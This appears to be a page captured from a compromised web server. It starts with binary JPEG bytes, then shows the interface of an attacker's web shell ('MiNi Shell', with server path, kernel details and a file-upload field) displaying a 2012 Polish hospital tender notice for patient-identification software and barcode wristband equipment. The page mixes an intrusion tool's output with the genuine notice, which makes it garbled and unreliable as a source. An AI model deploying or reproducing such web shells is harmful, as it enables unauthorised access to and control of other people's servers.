JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/429058-N-2012.html

<p class="kh_header"><b>Radom: Zakup sprzętu i oprogramowania informatycznego dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 429058 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu i oprogramowania informatycznego dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup sprzętu i oprogramowania informatycznego dla potrzeb Radomskiego Szpitala Specjalistycznego, tj: rozbudowa użytkowanego systemu InfoMedica w zakresie  Ruchu Chorych - zakup modułu oprogramowania do Identyfikacji Pacjenta wraz z wdrożeniem, dostawą drukarek i skanerów kodów kreskowych.
Zamówienie będzie realizowane na bazie funkcjonującego w Szpitalu systemu Informatycznego InfoMedica firmy Asseco Poland .S.A..
Zastosowane nazewnictwo:
Moduł oprogramowania do Identyfikacji Pacjenta stanowiący rozszerzenie użytkowanego systemu InfoMedica, dla uproszczenia będzie dalej nazywany oprogramowanie aplikacyjnym.
1.	Opis, wielkość i zakres:
           Przewiduje się następujące etapy realizacji zamówienia:
a.	Dostawa licencji otwartej (dla nieograniczonej liczby jednoczesnych użytkowników) oprogramowania aplikacyjnego;
b.	Instalacja i konfiguracja oprogramowania aplikacyjnego na serwerze i stacjach roboczych;
c.	Dostawa drukarek opasek na rękę, skanerów ręcznych ich instalacja i konfiguracja. Liczba oraz specyfikacja techniczna drukarek opasek z kodami kreskowymi i skanerów ręcznych w załączniku.
d.	Dostawa opasek identyfikacyjnych. Ilość oraz specyfikacja techniczna w załączniku.
e.	Wdrożenie dostarczonego oprogramowania aplikacyjnego, drukarek i skanerów kodów kreskowych;
f.	Gwarancyjny 12-sto miesięczny serwis autorski (producenta oprogramowania) dostarczonego oprogramowania aplikacyjnego;
g.	Roczny serwis techniczny oferenta dla oprogramowania aplikacyjnego (od dnia zakończenia wdrożenia);
h.	Dostawa aparatu fotograficznego i drukarki atramentowej. Specyfikacja techniczna w załączniku.
Ad 1. a,b,c,d
Zakres :
- Dostawa, instalacja i konfiguracja oprogramowania aplikacyjnego na serwerze:
- Identyfikacja Pacjenta - licencja otwarta
- Na przeznaczonym do zainstalowania oprogramowania aplikacyjnego serwerze, uruchomiony jest serwer bazy Oracle Standard Edition One 10g i korzystające z niego oprogramowanie systemu InfoMedica.
- Konfiguracja wskazanych stacji roboczych do współpracy z oprogramowaniem aplikacyjnym. Stacje robocze mają zainstalowany system operacyjny Microsoft Windows XP Prof. i Win7 Prof. 
- Konfiguracja i dostosowanie do potrzeb Zamawiającego oprogramowania aplikacyjnego.
- Dostawa, instalacja, konfiguracja drukarek i skanerów przy wskazanych stacjach roboczych.
- Dostawa opasek identyfikacyjnych.
- Integracja dostarczonego oprogramowania aplikacyjnego z użytkowanym systemem InfoMedica.
Ad 1. e
- Wdrożenie :
W ramach wdrożenia użytkownikom przekazana musi zostać wiedza niezbędna do poprawnego użytkowania oprogramowania w zakresie jego administrowania, obsługi oprogramowania aplikacyjnego oraz obsługi drukarek i skanerów kodów kreskowych.
- Liczba osób uczestniczących w wdrożeniu : 
- 1-2 osoby z oddziału/działu (ok.50 osób)
- 3 osoby  z działu informatyki (administratorzy). 
- Wykonawca jest zobowiązany załączyć do swojej oferty proponowany ramowy harmonogram realizacji  wdrożenia.
Ad 1. f,g
Dostawca oprogramowania zapewni 12-sto miesięczny serwis autorski oprogramowania aplikacyjnego.
Wykonawca zapewni roczny serwis techniczny oprogramowania aplikacyjnego (od dnia zakończenia wdrożenia) w którego zakres wchodzi :
a)	instalowanie i wdrażanie aktualnych oprogramowania;
b)	bieżąca pomoc w użytkowaniu oprogramowania;
c)	pomoc w usunięciu awarii oprogramowania objętego niniejszą umową, powstałej z winy Zamawiającego lub wskutek wypadków losowych. 
d)	weryfikację integralności baz danych;
e)	bieżące optymalizowanie konfiguracji oprogramowania, uwzględniające potrzeby Zamawiającego;
d)	pomoc w awaryjnym odtwarzaniu, na wniosek Zamawiającego, stanu oprogramowania i zgromadzonych danych archiwalnych, poprawnie zabezpieczonych na odpowiednich nośnikach;
e)	doradztwo w zakresie rozbudowy środków informatycznych, dokonywanie ponownych instalacji oprogramowania objętego niniejszym zamówieniem w przypadkach rozbudowy infrastruktury informatycznej Zamawiającego;
f)	prowadzenie rejestru kontaktów z Zamawiającym, obejmującego wizyty serwisowe i wykonane czynności, w tym zmiany konfiguracji oprogramowania.
g)	w ramach obsługi telefonicznej (hot-line) i internetowej Zamawiający może zgłosić pytania na temat używanych produktów, zwłaszcza oprogramowania. 
Ad 1. h
Dostawa aparatu fotograficznego i drukarki atramentowej
2.	Wymagania techniczne:
1)	Oprogramowanie : InfoMedica - moduł Identyfikacja Pacjenta - licencja otwarta
Lp.	Funkcjonalność 	Wymagane
1	W zakresie Ruchu Chorych i Lecznictwa Otwartego (izba przyjęć, oddział, statystyka, rejestracja, gabinet) 
- wydruk opaski lub naklejki z kodem paskowym dla pacjenta 
- wyszukiwanie pacjentów na liście wg różnych parametrów, w tym wg kodu paskowego znajdującego się na opasce	Tak
2	W zakresie modułu administrator: 
- definiowanie szablonów wydruków (pism) w tym opasek i naklejek identyfikujących pacjenta,	Tak
2)	Drukarka opasek na rękę  z możliwością druku sieciowego - szt. 1
Lp.	Dane techniczne	Parametr	Wymagane
1.		Rodzaj druku:	termiczny	tak
2.		Rozdzielczość druku [dpi]:	300	tak
3.		Maks. prędkość druku [mm-s]:	51	tak
4.		Szerokość druku [mm]:	19.05, 25.4, 30.16, 19.05	tak
5.		Maks. długość druku [mm]:	558	tak
6.		Szerokość etykiety [mm]:	19.05, 25.4, 30.16	tak
7.		Wysokość etykiety [mm]:	279.4	tak
8.		Procesor:	32-bit	tak
9.		Ilość pamięci FLASH:	8 MB	tak
10.		Ilość pamięci RAM:	16 MB	tak
11.		Dostępne interfejsy:	USB, RS-232, Ethernet (LAN)	tak
12.		Złącza:	USB	tak
13.		Zasilanie:	AC 100 - 240 V, 50 - 60 Hz	tak
14.		Języki programowania:	ZPL, ZPL2, XML	tak
15.		Gwarancja producenta [mc]:	12	tak
16.		Kody kreskowe:	1D, 2D, GS1 Databar, PDF	tak
3)	Drukarka opasek na rękę - szt. 4
Lp.	Dane techniczne	Parametr	Wymagane
1.		Typ	termiczny	tak
2.		Rozdzielczość druku [dpi]:	300	tak
3.		Maks. prędkość druku [mm-s]:	51	tak
4.		Szerokość druku [mm]:	19.05, 25.4, 30.16, 19.05	tak
5.		Maks. długość druku [mm]:	558	tak
6.		Szerokość etykiety [mm]:	19.05, 25.4, 30.16	tak
7.		Wysokość etykiety [mm]:	279.4	tak
8.		Procesor:	32-bit	tak
9.		Ilość pamięci FLASH:	8 MB	tak
10.		Ilość pamięci RAM:	16 MB	tak
11.		Dostępne interfejsy:	USB, RS-232	tak
12.		Złącza:	USB	tak
13.		Zasilanie:	AC 100 - 240 V, 50 - 60 Hz	tak
14.		Języki programowania:	ZPL, ZPL2, XML	tak
15.		Gwarancja producenta [mc]:	12	tak
16.		Kody kreskowe:	1D, 2D, GS1 Databar, PDF	tak
4)	Skaner ręczny - szt. 20
Lp	Dane techniczne	Parametr	Wymagane
1.		Typ	1D	tak
2.		Gwarancja producenta [mc]:	60	tak
3.		Dostępne interfejsy:	USB	tak
4.		Kabel komunikacyjny:	USB	tak
5.		Maks. odległość odczytu (UPC 100%) [cm]:	43	tak
6.		Odporność na wodę i kurz	Szczelna obudowa	tak
7.		Bezpieczny upadek na twardą pow. [m]:	Wielokrotny upadek z wysokości 1,5 metr 	tak
8.		Technologia odczytu:	laser jednoliniowy	tak
9.		Temperatura pracy:	od 0°C do 50°C	tak
10.		Sygnalizacja:	dźwiękowa	tak
11.		Wymagany kontrast kodu [%]:	20	tak

5)	Materiały eksploatacyjne :
           Opaski identyfikacyjne dla dorosłych na rękę - szt. 56.000 opasek na dwa lata
L.p.	Dane techniczne	Parametr	Wymagane
1.	Typ	Zgodny z oferowanymi drukarkami do kodów paskowych	tak
2.	Rozmiar	25mmx275mm	tak
3.	Kolor	Biały	tak
4.	Rodzaj etykiety	Termiczna	tak
Opaski identyfikacyjne dla dzieci na rękę - szt.  4000 opasek na dwa lata
L.p.	Dane techniczne	Parametr	Wymagane
1.	Typ	Zgodny z oferowanymi drukarkami do kodów paskowych	tak
2.	Rozmiar	25mmx178mm	tak
3.	Kolor	Biały	tak
4.	Rodzaj etykiety	Termiczna	tak
Opaski identyfikacyjne dla niemowląt - szt. 5000 opasek na dwa lata
L.p.	Dane techniczne	Parametr	Wymagane
1.	Typ	Zgodny z oferowanymi drukarkami do kodów paskowych	tak
2.	Rozmiar	25mmx152mm	tak
3.	Kolor	Biały	tak
4.	Rodzaj etykiety	termiczna	tak
6) Aparat fotograficzny
Aparat fotograficzny
KPL.	1
PARAMETRY  APARATU FOTOGRAFICZNEGO
Lp.	Nazwa	Parametry min.	Oferowane
1	Matryca	1 na 2.3-cala CCD
min. 14.0 milionów pikseli	

2	Pamięć wewnętrzna	Min 20MB	
3	Slot kart pamięci	1 x SD (z obsługą SDHC)	
4	Dostarczona pamięć	Karta SD min 8GB lub 2x4GB SDHC 
min, prędkość zapisu 20MB/s, min prędkość odczytu 20MB na s 	

5	Format zapisu plików	Zdjęcia: JPEG (Exif Ver. 2.3 )
Filmy : AVI (Motion JPEG) z dzwiękiem
Audio: format WAVE, dźwięk monofoniczny
(Zgodność z regułą systemu plików dla cyfrowych aparatów fotograficznych , kompatybilność z DPOF)	
6	Zoom Optyczny	Min. 18 x	
7	Zoom cyfrowy	 Min 6-krotny	
8	Interfejsy	HDMI MINI,HDMI	
		USB 2.0 High-Speed	
		NTSC,PAL możliwość wyboru	
		Port do bezpośrednie drukowanie zdjęć z aparatów i kamer zgodny ze standardem PictBridge	
9	Dodatkowy czytnik kart pamięci	SD, MMC, MS, MS PRO, xD	
10	Komunikacja	USB 2.0	
11	Czas pracy na baterii	Baterie alkaliczne: min. 300 zdjęć
Ni-MH: min 500 zdjęć
Baterie litowe : min. 700 zdjęć	
12	Przekątna ekranu LCD	Min 3 cale	
13	Obsługiwane rozdzielczości	L : (4:3) 4288 x 3216 , (3:2) 4288 x 2864 , (16:9) 4288 x 2416
M : (4:3) 3072 x 2304 , (3:2) 3072 x 2048 , (16:9) 3072 x 1728
S : (4:3) 2048 x 1536 , (3:2) 2048 x 1360 , (16:9) 1920 x 1080	
14	Kabel 	USB 2.0	
15	Kabel	Mini hdmi,hdmi lub hdmi/hdmi w zależności od sposobu podłączenia do wyjścia TV	
16	Stabilizacja obrazu	Wymagana	
17	Obsługiwane systemy operacyjne	Windows XP, Windows Vista, Windows7	
18	Rejestrowanie filmów	1280 (1280 x 720:HD), 30 klatek/sekundę.
640 (640 x 480:VGA), 30 klatek/sekundę.
320 (320 x 240 QVGA) 30 klatek/sekundę.
z dźwiękiem monofonicznym lub stereo
zoom może być używany podczas rejestrowania filmów	
19	Zasilanie 	Akumulatorki 	
20	Ładowarka	Ładowarka akumulatorów (wraz z akumulatorami) 
21	Gwarancja	min. 2 lata	
22	Proponowany producent, model i typ	
 7) Drukarka atramentowa
Drukarka atramentowa
KPL.	1
PARAMETRY  DRUKARKI
Lp.	Nazwa	Parametry min.	Oferowane
1	Prędkość drukowania	Bez obramowania 10 x 15 cm: ok. 20 s;
Mono  : około 12 obr. na min;
Color : Około 9,3 obr. namin	

2	Typy nośników	Zwykły papier, koperty, papier Photo Paper Pro Platinum (PT-101), papier Photo Paper Plus Glossy II (PP-201), papier dwustronny Photo Paper Plus Semi-gloss (SG-201), papier Glossy Photo Paper (Everyday Use) (GP-501), papier Matte Photo Paper (MP-101), papier High Resolution Paper (HR-101N), nośnik T-shirt Transfer (TR-301), naklejki Photo Stickers (PS-101)	
3	Podawanie nośnika	Tylna taca: maks. 150 arkuszy
Kaseta: maks. 150 arkuszy	
4	Formaty nośników	Taca tylna: A4, B5, A5, Letter, Legal, koperty (format DL lub Commercial 10), 10 x 15 cm, 13 x 18 cm, 20 x 25 cm
Kaseta: A4, B5, A5, Letter	

5	Interfejs PC	USB Hi-Speed (Port B)	
6	Obsługiwane systemy operacyjne	Windows 7 (32- i 64-bit), Windows Vista (32- i 64-bit), Windows XP SP2, SP3	
7	Wkłady z atramentami	Osobny dla każdego koloru
8. Funkcja bezpośredniego drukowania z aparatu fotograficznego	
8) Papier fotograficzny
L.p.	Wyszczególnienie
1.	Papier fotograficzny 10x15 do drukowania na drukarkach atramentowych - zapotrzebowanie dwuletnie - 600 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.50-0, 38.52.00.00-6, 48.21.30.00-4, 22.45.51.00-5, 30.19.76.30-1, 38.65.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada odpowiednie doświadczenie w wykonaniu zamówienia (wymagana co najmniej 1 zrealizowana dostawa systemu Infomedica-Ruch Chorych);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada odpowiednią wiedzę i osoby zdolne do wykonania zamówienia tzn. dysponuje:
- 2 osobami posiadającymi odpowiednie certyfikaty w zakresie administrowania bazą danych - minimum Oracle 10g;
- 2 osobami posiadającymi odpowiednie certyfikaty w zakresie zarządzania systemami operacyjnymi Microsoft (MCSA)
- osobami posiadającymi wystawione przez producenta oprogramowania firmę ASSECO certyfikaty w zakresie świadczenia usług informatycznych dla oprogramowania InfoMedica tzn. instalacji, wdrażania, serwisowania oraz szkolenia użytkowników</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty,tj. 
1) Wpis do KRS lub ewidencji działalności gospodarczej - które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę,lub
2) Pełnomocnictwo -w oryginale lub w postaci kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany umowy:	
1) Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie 
bez zmian,
2)	Ceny jednostkowe brutto mogą również ulec zmianie po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy,
3)	Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Warunek przedmiotowy:
Zamawiający wymaga, aby serwis techniczny był realizowany zgodnie 
z wymaganiami normy ISO 9001 - 2008.
2. TERMIN WYKONANIA ZAMÓWIENIA:
1) Dostawa i wdrożenie modułu oprogramowania do Identyfikacji Pacjenta, dostawa drukarki opasek na rękę, skanera ręcznego, aparatu fotograficznego oraz drukarki atramentowej - do dnia 10.12.2012r.
2) Dostawa opasek identyfikacyjnych oraz papieru fotograficznego - dostawy sukcesywne przez okres dwóch lat od daty zawarcia umowy lub do wyczerpania wartości umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com